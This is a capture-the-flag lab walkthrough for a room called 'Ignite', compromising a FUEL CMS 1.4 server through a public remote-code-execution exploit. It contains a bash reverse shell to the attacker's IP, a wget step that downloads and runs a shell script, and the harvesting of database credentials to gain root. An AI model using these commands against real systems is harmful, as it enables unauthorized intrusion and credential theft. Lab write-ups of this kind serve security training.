Ignite
Intro
Room Info
π Name
π― Target IP
10.10.174.21
π Difficulty level
π’Easy
π² Subscription type
Free
π§ OS
Linux
Recon
mkdir ignite
cd ignite
nmap -sV -sC -oA nmap_ignite 10.10.174.21PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Welcome to FUEL CMS
| http-robots.txt: 1 disallowed entry
|_/fuel/π Found FUEL CMS v. 1.4 on port
80
Local Recon
Navigate to
http://10.10.174.21/http://10.10.174.21/fueladmin:admin
Exploitation
Search for a Fuel CMS exploit
searchsploit fuel cms
searchsploit -m 50477
less 50477.py
python 50477.py -u http://10.10.174.21whoami
Reverse Shell
ip -br -c a
10.18.65.48 # my IP
subl shell.sh
# Insert this line for a bash reverse shell
/bin/bash -i >& /dev/tcp/10.18.65.48/3333 0>&1Setup a Python web server and a
nclistener on 2 different tabs
python -m http.server
nc -nvlp 3333Back in the exploited Fuel CMS
Enter Command $
wget http://10.18.65.48:8000/shell.sh -O shell.sh
bash shell.shπ© Reverse shell received in the
ncterminal
/usr/bin/script -qc /bin/bash /dev/null
cd /home/www-data
ls
cat flag.txt
6470e***************************Privilege Escalation
Enumerate Fuel CMS application
/var/www/html/fuel/application/config/
cat /var/www/html/fuel/application/config/database.php$db['default'] = array(
'dsn' => '',
'hostname' => 'localhost',
'username' => 'root',
'password' => 'mememe',
'database' => 'fuel_schema',
'dbdriver' => 'mysqli',
'dbprefix' => '',
'pconnect' => FALSE,
'db_debug' => (ENVIRONMENT !== 'production'),
'cache_on' => FALSE,
'cachedir' => '',
'char_set' => 'utf8',
'dbcollat' => 'utf8_general_ci',
'swap_pre' => '',
'encrypt' => FALSE,
'compress' => FALSE,
'stricton' => FALSE,
'failover' => array(),
'save_queries' => TRUE
);π Found database credentials:
root:mememe
Try to use those credentials for the
rootuser of the system
su root
whoami
cd
cat root.txt
b9bbc**************************
Last updated
Was this helpful?